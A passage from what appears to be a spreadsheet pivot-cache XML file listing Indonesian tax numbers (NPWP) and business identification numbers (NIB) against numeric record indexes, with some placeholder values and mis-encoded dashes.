    <s v="npwp"/>
    <s v="01‚Äì144‚Äì273‚Äì8‚Äì517‚Äì000"/>
  </r>
  <r>
    <x v="118"/>
    <s v="nib"/>
    <n v="9120016070238"/>
  </r>
  <r>
    <x v="119"/>
    <s v="npwp"/>
    <s v="01.703.601.3‚Äì431.000"/>
  </r>
  <r>
    <x v="120"/>
    <s v="npwp"/>
    <s v="80.770.172.7‚Äì732.000"/>
  </r>
  <r>
    <x v="121"/>
    <s v="npwp"/>
    <s v="66.604.362.5‚Äì941.000"/>
  </r>
  <r>
    <x v="122"/>
    <s v="npwp"/>
    <s v="03.160.560.3‚Äì047.000"/>
  </r>
  <r>
    <x v="123"/>
    <s v="npwp"/>
    <s v="03.281.089.7‚Äì041.000"/>
  </r>
  <r>
    <x v="123"/>
    <s v="nib"/>
    <n v="8120106723018"/>
  </r>
  <r>
    <x v="124"/>
    <s v="npwp"/>
    <s v="02.380.501.3‚Äì436.000"/>
  </r>
  <r>
    <x v="124"/>
    <s v="nib"/>
    <n v="8120000711862"/>
  </r>
  <r>
    <x v="125"/>
    <s v="npwp"/>
    <s v="02.039.113.2‚Äì046.000"/>
  </r>
  <r>
    <x v="126"/>
    <s v="npwp"/>
    <s v="02.039.113.2‚Äì046.000"/>
  </r>
  <r>
    <x v="127"/>
    <s v="npwp"/>
    <s v="71.033.355.0‚Äì702.000"/>
  </r>
  <r>
    <x v="127"/>
    <s v="nib"/>
    <n v="9120201311491"/>
  </r>
  <r>
    <x v="128"/>
    <s v="npwp"/>
    <s v="01‚Äì002‚Äì749‚Äì8‚Äì054‚Äì000"/>
  </r>
  <r>
    <x v="128"/>
    <s v="nib"/>
    <n v="8120311042039"/>
  </r>
  <r>
    <x v="129"/>
    <s v="npwp"/>
    <s v="31.547.678.8‚Äì402.000"/>
  </r>
  <r>
    <x v="130"/>
    <s v="npwp"/>
    <s v="03.040.483.4‚Äì041.000"/>
  </r>
  <r>
    <x v="130"/>
    <s v="nib"/>
    <n v="9120003152007"/>
  </r>
  <r>
    <x v="131"/>
    <s v="npwp"/>
    <s v="02.830.960.7‚Äì041.000"/>
  </r>
  <r>
    <x v="132"/>
    <s v="npwp"/>
    <s v="02‚Äì623‚Äì589‚Äì5‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="132"/>
    <s v="nib"/>
    <n v="9120309382514"/>
  </r>
  <r>
    <x v="133"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì401.001"/>
  </r>
  <r>
    <x v="134"/>
    <s v="npwp"/>
    <s v="02.487.828.2‚Äì811.000"/>
  </r>
  <r>
    <x v="135"/>
    <s v="npwp"/>
    <s v="80.905.711.0‚Äì704.000"/>
  </r>
  <r>
    <x v="135"/>
    <s v="nib"/>
    <n v="8120218280033"/>
  </r>
  <r>
    <x v="136"/>
    <s v="npwp"/>
    <s v="01.882.922.6‚Äì057.000"/>
  </r>
  <r>
    <x v="136"/>
    <s v="nib"/>
    <n v="8120004930669"/>
  </r>
  <r>
    <x v="137"/>
    <s v="npwp"/>
    <s v="02.076.488.2‚Äì057.000"/>
  </r>
  <r>
    <x v="137"/>
    <s v="nib"/>
    <n v="8120303860223"/>
  </r>
  <r>
    <x v="138"/>
    <s v="npwp"/>
    <s v="02.394.603.1‚Äì822.000"/>
  </r>
  <r>
    <x v="139"/>
    <s v="npwp"/>
    <s v="76.398.849.0‚Äì941.000"/>
  </r>
  <r>
    <x v="140"/>
    <s v="npwp"/>
    <s v="01.941.600.7‚Äì614.000"/>
  </r>
  <r>
    <x v="141"/>
    <s v="npwp"/>
    <s v="01.807.688.5‚Äì031.000"/>
  </r>
  <r>
    <x v="142"/>
    <s v="npwp"/>
    <s v="02.293.607.4‚Äì041.000"/>
  </r>
  <r>
    <x v="143"/>
    <s v="npwp"/>
    <s v="01.891.866.4‚Äì041.000"/>
  </r>
  <r>
    <x v="144"/>
    <s v="npwp"/>
    <s v="80.639.139.7‚Äì019.000"/>
  </r>
  <r>
    <x v="145"/>
    <s v="npwp"/>
    <s v="01.071.198.4‚Äì057.000"/>
  </r>
  <r>
    <x v="145"/>
    <s v="nib"/>
    <n v="9120007332059"/>
  </r>
  <r>
    <x v="146"/>
    <s v="npwp"/>
    <s v="80.161.230.0‚Äì041.000"/>
  </r>
  <r>
    <x v="147"/>
    <s v="npwp"/>
    <s v="81.544.238.9‚Äì041.000"/>
  </r>
  <r>
    <x v="148"/>
    <s v="npwp"/>
    <s v="bukti Pajak "/>
  </r>
  <r>
    <x v="149"/>
    <s v="npwp"/>
    <s v="11.111.111.1‚Äì111.111"/>
  </r>
  <r>
    <x v="150"/>
    <s v="npwp"/>
    <s v="01.772.284.4‚Äì038.000"/>
  </r>
  <r>
    <x v="151"/>
    <s v="npwp"/>
    <s v="31.270.905.8‚Äì432.000"/>
  </r>
  <r>
    <x v="152"/>
    <s v="npwp"/>
    <s v="09.789.070.1‚Äì732.000"/>
  </r>
  <r>
    <x v="153"/>
    <s v="npwp"/>
    <s v="01.061.076.4‚Äì093.000"/>
  </r>
  <r>
    <x v="153"/>
    <s v="nib"/>
    <n v="32884"/>
  </r>
  <r>
    <x v="154"/>
    <s v="npwp"/>
    <s v="02.092.800.8‚Äì305.000"/>
  </r>
  <r>
    <x v="154"/>
    <s v="nib"/>
    <n v="32319"/>
  </r>
  <r>
    <x v="155"/>
    <s v="npwp"/>
    <s v="01.343.593.8‚Äì046.000"/>
  </r>
  <r>
    <x v="156"/>
    <s v="npwp"/>
    <s v="81.544.238.9‚Äì041.000"/>
  </r>
  <r>
    <x v="157"/>
    <s v="npwp"/>
    <s v="03‚Äì125‚Äì050‚Äì9‚Äì044‚Äì000"/>
  </r>
  <r>
    <x v="157"/>
    <s v="nib"/>
    <n v="8120212241415"/>
  </r>
  <r>
    <x v="158"/>
    <s v="npwp"/>
    <s v="02.823.927.5‚Äì047.000"/>
  </r>
  <r>
    <x v="158"/>
    <s v="nib"/>
    <n v="8120006810692"/>
  </r>
  <r>
    <x v="159"/>
    <s v="npwp"/>
    <s v="81.517.320.8‚Äì811.000"/>
  </r>
  <r>
    <x v="159"/>
    <s v="nib"/>
    <n v="220107850531"/>
  </r>
  <r>
    <x v="160"/>
    <s v="npwp"/>
    <s v="81.052.367.0‚Äì041.000"/>
  </r>
  <r>
    <x v="160"/>
    <s v="nib"/>
    <n v="8120001731911"/>
  </r>
  <r>
    <x v="161"/>
    <s v="npwp"/>
    <s v="21.040.377.0‚Äì407.000"/>
  </r>
  <r>
    <x v="161"/>
    <s v="nib"/>
    <n v="9120306111607"/>
  </r>
  <r>
    <x v="162"/>
    <s v="npwp"/>
    <s v="02.192.829.6‚Äì503.000"/>
  </r>
  <r>
    <x v="163"/>
    <s v="npwp"/>
    <s v="31.434.872.3‚Äì507.001"/>
  </r>
  <r>
    <x v="164"/>
    <s v="npwp"/>
    <s v="02.115.861.3‚Äì513.000"/>
  </r>
  <r>
    <x v="165"/>
    <s v="npwp"/>
    <s v="71.457.674.1‚Äì434.000"/>
  </r>
  <r>
    <x v="166"/>
    <s v="npwp"/>
    <s v="02.830.960.7‚Äì041.000"/>
  </r>
  <r>
    <x v="167"/>
    <s v="npwp"/>
    <s v="02‚Äì830‚Äì960‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="167"/>
    <s v="nib"/>
    <n v="8120312003004"/>
  </r>
  <r>
    <x v="168"/>
    <s v="npwp"/>
    <s v="81.208.565.2‚Äì041.000"/>
  </r>
  <r>
    <x v="169"/>
    <s v="npwp"/>
    <s v="02.092.813.1‚Äì305.000"/>
  </r>
  <r>
    <x v="169"/>
    <s v="nib"/>
    <n v="22965"/>
  </r>
  <r>
    <x v="170"/>
    <s v="npwp"/>
    <s v="00.000.000.0‚Äì000.000"/>
  </r>
  <r>
    <x v="171"/>
    <s v="npwp"/>
    <s v="02.380.501.3‚Äì701.001"/>
  </r>
  <r>
    <x v="171"/>
    <s v="nib"/>
    <n v="8120000711862"/>
  </r>
  <r>
    <x v="172"/>
    <s v="npwp"/>
    <s v="01.300.602.8‚Äì056.000"/>
  </r>
  <r>
    <x v="173"/>
    <s v="npwp"/>
    <s v="02.470.669.9-436.000"/>
  </r>
  <r>
    <x v="174"/>
    <s v="npwp"/>
    <s v="01.627.995.2‚Äì304.000"/>
  </r>
  <r>
    <x v="174"/>
    <s v="nib"/>
    <n v="9120201121365"/>
  </r>
  <r>
    <x v="175"/>
    <s v="npwp"/>
    <s v="01‚Äì923‚Äì651‚Äì2‚Äì041‚Äì001"/>
  </r>
  <r>
    <x v="175"/>
    <s v="nib"/>
    <n v="8120004862383"/>
  </r>
  <r>
    <x v="176"/>
    <s v="npwp"/>
    <s v="31‚Äì607‚Äì285‚Äì9‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="176"/>
    <s v="nib"/>
    <n v="8120216092346"/>
  </r>
  <r>
    <x v="177"/>
    <s v="npwp"/>
    <s v="02.830.829.4‚Äì041.000"/>
  </r>
  <r>
    <x v="178"/>
    <s v="npwp"/>
    <s v="01.001.661.6‚Äì051.000"/>
  </r>
  <r>
    <x v="179"/>
    <s v="npwp"/>
    <s v="31.233.933.0‚Äì043.000"/>
  </r>
  <r>
    <x v="180"/>
    <s v="npwp"/>
    <s v="02.830.737.9‚Äì041.000"/>
  </r>
  <r>
    <x v="180"/>
    <s v="nib"/>
    <n v="8120005840218"/>
  </r>
  <r>
    <x v="181"/>
    <s v="npwp"/>
    <s v="02.830.829.4‚Äì041.000"/>
  </r>
  <r>
    <x v="181"/>
    <s v="nib"/>
    <n v="8120108960275"/>
  </r>
  <r>
    <x v="182"/>
    <s v="npwp"/>
    <s v="02.379.509.9‚Äì041.000"/>
  </r>
  <r>
    <x v="183"/>
    <s v="npwp"/>
    <s v="02.379.509.9‚Äì041.000"/>
  </r>
  <r>
    <x v="183"/>
    <s v="nib"/>
    <n v="8120005871564"/>
  </r>
  <r>
    <x v="184"/>
    <s v="npwp"/>
    <s v="01‚Äì341‚Äì636‚Äì7‚Äì062‚Äì000"/>
  </r>
  <r>
    <x v="184"/>
    <s v="nib"/>
    <n v="8120206830312"/>
  </r>
  <r>
    <x v="185"/>
    <s v="npwp"/>
    <s v="02.830.844.3‚Äì041.000"/>
  </r>
  <r>
    <x v="185"/>
    <s v="nib"/>
    <n v="8120201712078"/>
  </r>
  <r>
    <x v="186"/>
    <s v="npwp"/>
    <s v="01.001.701.0‚Äì092.000"/>
  </r>
  <r>
    <x v="187"/>
    <s v="npwp"/>
    <s v="03.233.102.7‚Äì815.000"/>
  </r>
  <r>
    <x v="188"/>
    <s v="npwp"/>
    <s v="01.002.148.3‚Äì054.000"/>
  </r>
  <r>
    <x v="189"/>
    <s v="npwp"/>
    <s v="02.461.328.3‚Äì047.000"/>
  </r>
  <r>
    <x v="189"/>
    <s v="nib"/>
    <n v="8120007870315"/>
  </r>
  <r>
    <x v="190"/>
    <s v="npwp"/>
    <s v="01.300.156.5‚Äì047.000"/>
  </r>
  <r>
    <x v="191"/>
    <s v="npwp"/>
    <s v="81.281.146.1‚Äì041.000"/>
  </r>
  <r>
    <x v="191"/>
    <s v="nib"/>
    <n v="9120101811405"/>
  </r>
  <r>
    <x v="192"/>
    <s v="npwp"/>
    <s v="01.360.591.0‚Äì007.000"/>
  </r>
  <r>
    <x v="192"/>
    <s v="nib"/>
    <n v="8120000821515"/>
  </r>
  <r>
    <x v="193"/>
    <s v="npwp"/>
    <s v="21‚Äì038‚Äì082‚Äì0‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="193"/>
    <s v="nib"/>
    <n v="8120002792833"/>
  </r>
  <r>
    <x v="194"/>
    <s v="npwp"/>
    <s v="73.588.626.9-085.000"/>
  </r>
  <r>
    <x v="195"/>
    <s v="npwp"/>
    <s v="31.428.280.7‚Äì418.000"/>
  </r>
  <r>
    <x v="196"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="196"/>
    <s v="nib"/>
    <n v="9120508792239"/>
  </r>
  <r>
    <x v="197"/>
    <s v="npwp"/>
    <s v="02.571.619.2‚Äì941.000"/>
  </r>
  <r>
    <x v="198"/>
    <s v="npwp"/>
    <s v="02‚Äì189‚Äì571‚Äì9‚Äì037‚Äì000"/>
  </r>
  <r>
    <x v="198"/>
    <s v="nib"/>
    <n v="8120002841036"/>
  </r>
  <r>
    <x v="199"/>
    <s v="npwp"/>
    <s v="31.529.200.3-403.000"/>
  </r>
  <r>
    <x v="199"/>
    <s v="nib"/>
    <n v="9120402292212"/>
  </r>
  <r>
    <x v="200"/>
    <s v="npwp"/>
    <s v="02.115.638.5‚Äì059.000"/>
  </r>
  <r>
    <x v="201"/>
    <s v="npwp"/>
    <s v="02.812.141.6‚Äì941.000"/>
  </r>
  <r>
    <x v="202"/>
    <s v="npwp"/>
    <s v="02.812.141.6‚Äì941.000"/>
  </r>
  <r>
    <x v="203"/>
    <s v="npwp"/>
    <s v="32.338.104.2‚Äì502.000"/>
  </r>
  <r>
    <x v="203"/>
    <s v="nib"/>
    <n v="8120102972575"/>
  </r>
  <r>
    <x v="204"/>
    <s v="npwp"/>
    <s v="01.309.570.8‚Äì015.000"/>
  </r>
  <r>
    <x v="204"/>
    <s v="nib"/>
    <n v="8120003871549"/>
  </r>
  <r>
    <x v="205"/>
    <s v="npwp"/>
    <s v="01.071.134.9‚Äì941.000"/>
  </r>
  <r>
    <x v="206"/>
    <s v="npwp"/>
    <s v="03.125.050.9‚Äì044.000"/>
  </r>
  <r>
    <x v="206"/>
    <s v="nib"/>
    <n v="8120212241415"/>
  </r>
  <r>
    <x v="207"/>
    <s v="npwp"/>
    <s v="73.605.634.2‚Äì047.000"/>
  </r>
  <r>
    <x v="207"/>
    <s v="nib"/>
    <n v="8120000880915"/>
  </r>
  <r>
    <x v="208"/>
    <s v="npwp"/>
    <s v="75.652.491.4‚Äì507.000"/>
  </r>
  <r>
    <x v="209"/>
    <s v="npwp"/>
    <s v="72‚Äì018‚Äì560‚Äì2‚Äì413‚Äì000"/>
  </r>
  <r>
    <x v="209"/>
    <s v="nib"/>
    <n v="8120108823315"/>
  </r>
  <r>
    <x v="210"/>
    <s v="npwp"/>
    <s v="01‚Äì870‚Äì966‚Äì7‚Äì941‚Äì001"/>
  </r>
  <r>
    <x v="210"/>
    <s v="nib"/>
    <n v="8120004791485"/>
  </r>
  <r>
    <x v="211"/>
    <s v="npwp"/>
    <s v="75.554.941.7‚Äì816.000"/>
  </r>
  <r>
    <x v="212"/>
    <s v="npwp"/>
    <s v="01.567.935.0‚Äì631.000"/>
  </r>
  <r>
    <x v="212"/>
    <s v="nib"/>
    <n v="8120103783113"/>
  </r>
  <r>
    <x v="213"/>
    <s v="npwp"/>
    <s v="03.211.945.5‚Äì085.000"/>
  </r>
  <r>
    <x v="214"/>
    <s v="npwp"/>
    <s v="03.211.945.5‚Äì085.000"/>
  </r>
  <r>
    <x v="215"/>
    <s v="npwp"/>
    <s v="01.100.476.9‚Äì041.001"/>
  </r>
  <r>
    <x v="216"/>
    <s v="npwp"/>
    <s v="01.342.405.6‚Äì627.000"/>
  </r>
  <r>
    <x v="217"/>
    <s v="npwp"/>
    <s v="00.000.000.0‚Äì000.000"/>
  </r>
  <r>
    <x v="218"/>
    <s v="npwp"/>
    <s v="01.891.752.6‚Äì046.000"/>
  </r>
  <r>
    <x v="218"/>
    <s v="nib"/>
    <n v="8120411101949"/>
  </r>
  <r>
    <x v="219"/>
    <s v="npwp"/>
    <s v="01.083.032.1‚Äì631.000"/>
  </r>
  <r>
    <x v="220"/>
    <s v="npwp"/>
    <s v="02.792.376.2‚Äì044.000"/>
  </r>
  <r>
    <x v="221"/>
    <s v="npwp"/>
    <s v="01.776.232.9‚Äì038.000"/>
  </r>
  <r>
    <x v="222"/>
    <s v="npwp"/>
    <s v="76.552.521.7‚Äì941.000"/>
  </r>
  <r>
    <x v="223"/>
    <s v="npwp"/>
    <s v="66.029.449.7‚Äì426.000"/>
  </r>
  <r>
    <x v="223"/>
    <s v="nib"/>
    <n v="8120210221782"/>
  </r>
  <r>
    <x v="224"/>
    <s v="npwp"/>
    <s v="01.233.310.0‚Äì641.000"/>
  </r>
  <r>
    <x v="225"/>
    <s v="npwp"/>
    <s v="01‚Äì465‚Äì954‚Äì4‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="226"/>
    <s v="npwp"/>
    <s v="01.233.310.0‚Äì641.000"/>
  </r>
  <r>
    <x v="227"/>
    <s v="npwp"/>
    <s v="01.342.346.2‚Äì627.000"/>
  </r>
  <r>
    <x v="228"/>
    <s v="npwp"/>
    <s v="01.458.735.6‚Äì641.000"/>
  </r>
  <r>
    <x v="228"/>
    <s v="nib"/>
    <n v="9120004171711"/>
  </r>
  <r>
    <x v="229"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì648.001"/>
  </r>
  <r>
    <x v="229"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="230"/>
    <s v="npwp"/>
    <s v="01.137.423.8‚Äì651.000"/>
  </r>
  <r>
    <x v="230"/>
    <s v="nib"/>
    <n v="8120009890233"/>
  </r>
  <r>
    <x v="231"/>
    <s v="npwp"/>
    <s v="03.206.389.3‚Äì609.000"/>
  </r>
  <r>
    <x v="232"/>
    <s v="npwp"/>
    <s v="01.913.211.7‚Äì625.000"/>
  </r>
  <r>
    <x v="233"/>
    <s v="npwp"/>
    <s v="02.208.003.0‚Äì615.000"/>
  </r>
  <r>
    <x v="233"/>
    <s v="nib"/>
    <n v="8120107850022"/>
  </r>
  <r>
    <x v="234"/>
    <s v="npwp"/>
    <s v="02.026.181.4‚Äì641.000"/>
  </r>
  <r>
    <x v="234"/>
    <s v="nib"/>
    <n v="8120011092664"/>
  </r>
  <r>
    <x v="235"/>
    <s v="npwp"/>
    <s v="01‚Äì148‚Äì487‚Äì0‚Äì054‚Äì000"/>
  </r>
  <r>
    <x v="235"/>
    <s v="nib"/>
    <n v="8120008802502"/>
  </r>
  <r>
    <x v="236"/>
    <s v="npwp"/>
    <s v="02‚Äì800‚Äì251‚Äì7‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="236"/>
    <s v="nib"/>
    <n v="8120013210781"/>
  </r>
  <r>
    <x v="237"/>
    <s v="npwp"/>
    <s v="01.821.663.0‚Äì651.000"/>
  </r>
  <r>
    <x v="238"/>
    <s v="npwp"/>
    <s v="02.384.452.5‚Äì651.000"/>
  </r>
  <r>
    <x v="239"/>
    <s v="npwp"/>
    <s v="02.268.035.9‚Äì723.000"/>
  </r>
  <r>
    <x v="239"/>
    <s v="nib"/>
    <n v="8120111021183"/>
  </r>
  <r>
    <x v="240"/>
    <s v="npwp"/>
    <s v="02.067.758.9‚Äì615.001"/>
  </r>
  <r>
    <x v="241"/>
    <s v="npwp"/>
    <s v="31.470.640.9‚Äì627.000"/>
  </r>
  <r>
    <x v="241"/>
    <s v="nib"/>
    <n v="8120104811249"/>
  </r>
  <r>
    <x v="242"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì612.002"/>
  </r>
  <r>
    <x v="242"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="243"/>
    <s v="npwp"/>
    <s v="01.643.415.1‚Äì643.001"/>
  </r>
  <r>
    <x v="244"/>
    <s v="npwp"/>
    <s v="01‚Äì829‚Äì654‚Äì1‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="244"/>
    <s v="nib"/>
    <n v="9120003160155"/>
  </r>
  <r>
    <x v="245"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì641.000"/>
  </r>
  <r>
    <x v="245"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="246"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="246"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="247"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì641.000"/>
  </r>
  <r>
    <x v="247"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="248"/>
    <s v="npwp"/>
    <s v="01.830.004.6‚Äì651.000"/>
  </r>
  <r>
    <x v="249"/>
    <s v="npwp"/>
    <s v="01.830.004.6‚Äì651.000"/>
  </r>
  <r>
    <x v="250"/>
    <s v="npwp"/>
    <s v="66.176.187.4‚Äì012.000"/>
  </r>
  <r>
    <x v="250"/>
    <s v="nib"/>
    <n v="8120103821655"/>
  </r>
  <r>
    <x v="251"/>
    <s v="npwp"/>
    <s v="21.092.762.0‚Äì047.000"/>
  </r>
  <r>
    <x v="251"/>
    <s v="nib"/>
    <n v="8120301820812"/>
  </r>
  <r>
    <x v="252"/>
    <s v="npwp"/>
    <s v="03.183.128.2‚Äì041.000"/>
  </r>
  <r>
    <x v="252"/>
    <s v="nib"/>
    <n v="8120006800439"/>
  </r>
  <r>
    <x v="253"/>
    <s v="npwp"/>
    <s v="01.313.605.6‚Äì037.000"/>
  </r>
  <r>
    <x v="253"/>
    <s v="nib"/>
    <n v="9120006150045"/>
  </r>
  <r>
    <x v="254"/>
    <s v="npwp"/>
    <s v="03.006.175.8‚Äì215.000"/>
  </r>
  <r>
    <x v="255"/>
    <s v="npwp"/>
    <s v="01.643.415.7‚Äì622.000"/>
  </r>
  <r>
    <x v="256"/>
    <s v="npwp"/>
    <s v="04.218.418.4‚Äì622.000"/>
  </r>
  <r>
    <x v="257"/>
    <s v="npwp"/>
    <s v="02.876.339.9‚Äì617.000"/>
  </r>
  <r>
    <x v="257"/>
    <s v="nib"/>
    <n v="9120203571503"/>
  </r>
  <r>
    <x v="258"/>
    <s v="npwp"/>
    <s v="01.707.736.3‚Äì651.000"/>
  </r>
  <r>
    <x v="258"/>
    <s v="nib"/>
    <n v="9120202591664"/>
  </r>
  <r>
    <x v="259"/>
    <s v="npwp"/>
    <s v="02.391.429.4‚Äì617.000"/>
  </r>
  <r>
    <x v="259"/>
    <s v="nib"/>
    <n v="8120107902909"/>
  </r>
  <r>
    <x v="260"/>
    <s v="npwp"/>
    <s v="01.468.067.2‚Äì651.000"/>
  </r>
  <r>
    <x v="260"/>
    <s v="nib"/>
    <n v="8120106862498"/>
  </r>
  <r>
    <x v="261"/>
    <s v="npwp"/>
    <s v="02.316.412.1‚Äì511.212"/>
  </r>
  <r>
    <x v="262"/>
    <s v="npwp"/>
    <s v="01.775.968.9‚Äì005.000"/>
  </r>
  <r>
    <x v="263"/>
    <s v="npwp"/>
    <s v="71.309.342.5‚Äì041.000"/>
  </r>
  <r>
    <x v="263"/>
    <s v="nib"/>
    <n v="8120019092935"/>
  </r>
  <r>
    <x v="264"/>
    <s v="npwp"/>
    <s v="21.127.466.7‚Äì432.000"/>
  </r>
  <r>
    <x v="265"/>
    <s v="npwp"/>
    <s v="31‚Äì379‚Äì592‚Äì4‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="265"/>
    <s v="nib"/>
    <n v="8120001731819"/>
  </r>
  <r>
    <x v="266"/>
    <s v="npwp"/>
    <s v="76.897.976.7‚Äì004.000"/>
  </r>
  <r>
    <x v="267"/>
    <s v="npwp"/>
    <s v="66.425.026.3‚Äì041.000"/>
  </r>
  <r>
    <x v="267"/>
    <s v="nib"/>
    <n v="8120005851731"/>
  </r>
  <r>
    <x v="268"/>
    <s v="npwp"/>
    <s v="02.192.865.0‚Äì057.000"/>
  </r>
  <r>
    <x v="268"/>
    <s v="nib"/>
    <n v="8120214271874"/>
  </r>
  <r>
    <x v="269"/>
    <s v="npwp"/>
    <s v="58‚Äì128‚Äì609‚Äì3‚Äì085‚Äì000"/>
  </r>
  <r>
    <x v="269"/>
    <s v="nib"/>
    <n v="8120206860396"/>
  </r>
  <r>
    <x v="270"/>
    <s v="npwp"/>
    <s v="72.158.394.6‚Äì041.000"/>
  </r>
  <r>
    <x v="271"/>
    <s v="npwp"/>
    <s v="01.069.501.3‚Äì057.000"/>
  </r>
  <r>
    <x v="271"/>
    <s v="nib"/>
    <n v="9120307462397"/>
  </r>
  <r>
    <x v="272"/>
    <s v="npwp"/>
    <s v="01.454.019.9‚Äì631.000"/>
  </r>
  <r>
    <x v="272"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="273"/>
    <s v="npwp"/>
    <s v="01.886.481.9‚Äì057.000"/>
  </r>
  <r>
    <x v="273"/>
    <s v="nib"/>
    <n v="9120001592276"/>
  </r>
  <r>
    <x v="274"/>
    <s v="npwp"/>
    <s v="75.212.395.0‚Äì047.001"/>
  </r>
  <r>
    <x v="274"/>
    <s v="nib"/>
    <n v="8120203962304"/>
  </r>
  <r>
    <x v="275"/>
    <s v="npwp"/>
    <s v="01.083.287.1‚Äì651.000"/>
  </r>
  <r>
    <x v="275"/>
    <s v="nib"/>
    <n v="8120119072991"/>
  </r>
  <r>
    <x v="276"/>
    <s v="npwp"/>
    <s v="76.487.979.7‚Äì101.000"/>
  </r>
  <r>
    <x v="277"/>
    <s v="npwp"/>
    <s v="02‚Äì728‚Äì709‚Äì4‚Äì431‚Äì000"/>
  </r>
  <r>
    <x v="277"/>
    <s v="nib"/>
    <n v="8120002881639"/>
  </r>
  <r>
    <x v="278"/>
    <s v="npwp"/>
    <s v="31.328.567.8‚Äì617.000"/>
  </r>
  <r>
    <x v="278"/>
    <s v="nib"/>
    <n v="8120015081591"/>
  </r>
  <r>
    <x v="279"/>
    <s v="npwp"/>
    <s v="02.116.078.3‚Äì057.000"/>
  </r>
  <r>
    <x v="280"/>
    <s v="npwp"/>
    <s v="72.132.706.2‚Äì513.000"/>
  </r>
  <r>
    <x v="281"/>
    <s v="npwp"/>
    <s v="71.323.777.4‚Äì507.000"/>
  </r>
  <r>
    <x v="282"/>
    <s v="npwp"/>
    <s v="71.028.111.4‚Äì501.000"/>
  </r>
  <r>
    <x v="283"/>
    <s v="npwp"/>
    <s v="80.989.346.4‚Äì447.000"/>
  </r>
  <r>
    <x v="284"/>
    <s v="npwp"/>
    <s v="01.356.452.1‚Äì058.000"/>
  </r>
  <r>
    <x v="284"/>
    <s v="nib"/>
    <n v="8120006952712"/>
  </r>
  <r>
    <x v="285"/>
    <s v="npwp"/>
    <s v="02.713.846.0‚Äì641.000"/>
  </r>
  <r>
    <x v="285"/>
    <s v="nib"/>
    <n v="8120002811685"/>
  </r>
  <r>
    <x v="286"/>
    <s v="npwp"/>
    <s v="72.579.838.3‚Äì518.000"/>
  </r>
  <r>
    <x v="287"/>
    <s v="npwp"/>
    <s v="80.634.541.9‚Äì723.000"/>
  </r>
  <r>
    <x v="288"/>
    <s v="npwp"/>
    <s v="01.001.701.0‚Äì092.000"/>
  </r>
  <r>
    <x v="289"/>
    <s v="npwp"/>
    <s v="02.988.541.5‚Äì086.000"/>
  </r>
  <r>
    <x v="289"/>
    <s v="nib"/>
    <n v="8120000711625"/>
  </r>
  <r>
    <x v="290"/>
    <s v="npwp"/>
    <s v="01.961.201.9‚Äì522.000"/>
  </r>
  <r>
    <x v="291"/>
    <s v="npwp"/>
    <s v="80.535.588.0‚Äì041.000"/>
  </r>
  <r>
    <x v="292"/>
    <s v="npwp"/>
    <s v="01.952.405.7‚Äì007.000"/>
  </r>
  <r>
    <x v="293"/>
    <s v="npwp"/>
    <s v="01.952.405.7‚Äì007.000"/>
  </r>
  <r>
    <x v="294"/>
    <s v="npwp"/>
    <s v="72.616770.3-041.000"/>
  </r>
  <r>
    <x v="294"/>
    <s v="nib"/>
    <n v="9120108170524"/>
  </r>
  <r>
    <x v="295"/>
    <s v="npwp"/>
    <s v="31.434.872.3‚Äì507.001"/>
  </r>
  <r>
    <x v="295"/>
    <s v="nib"/>
    <n v="8120110150174"/>
  </r>
  <r>
    <x v="296"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì811.001"/>
  </r>
  <r>
    <x v="297"/>
    <s v="npwp"/>
    <s v="71.178.017.1‚Äì822.000"/>
  </r>
  <r>
    <x v="298"/>
    <s v="npwp"/>
    <s v="76‚Äì095‚Äì545‚Äì0‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="299"/>
    <s v="npwp"/>
    <s v="66‚Äì418‚Äì537‚Äì8‚Äì022‚Äì000"/>
  </r>
  <r>
    <x v="299"/>
    <s v="nib"/>
    <n v="81200079100152"/>
  </r>
  <r>
    <x v="300"/>
    <s v="npwp"/>
    <s v="01.961.201.9‚Äì811.001"/>
  </r>
  <r>
    <x v="301"/>
    <s v="npwp"/>
    <s v="01.961.201.9‚Äì811.001"/>
  </r>
  <r>
    <x v="301"/>
    <s v="nib"/>
    <n v="8120001762634"/>
  </r>
  <r>
    <x v="302"/>
    <s v="npwp"/>
    <s v="82.591.197.7‚Äì041.000"/>
  </r>
  <r>
    <x v="303"/>
    <s v="npwp"/>
    <s v="74.719.423.1‚Äì507.000"/>
  </r>
  <r>
    <x v="303"/>
    <s v="nib"/>
    <n v="8120002762444"/>
  </r>
  <r>
    <x v="304"/>
    <s v="npwp"/>
    <s v="02.747.876.7‚Äì048.000"/>
  </r>
  <r>
    <x v="304"/>
    <s v="nib"/>
    <n v="8120201810775"/>
  </r>
  <r>
    <x v="305"/>
    <s v="npwp"/>
    <s v="31‚Äì654‚Äì028‚Äì5‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="305"/>
    <s v="nib"/>
    <n v="8120004850512"/>
  </r>
  <r>
    <x v="306"/>
    <s v="npwp"/>
    <s v="73.020.214.0‚Äì043.000"/>
  </r>
  <r>
    <x v="307"/>
    <s v="npwp"/>
    <s v="36.347.884.3‚Äì702.000"/>
  </r>
  <r>
    <x v="308"/>
    <s v="npwp"/>
    <s v="03.280.957.6‚Äì041.000"/>
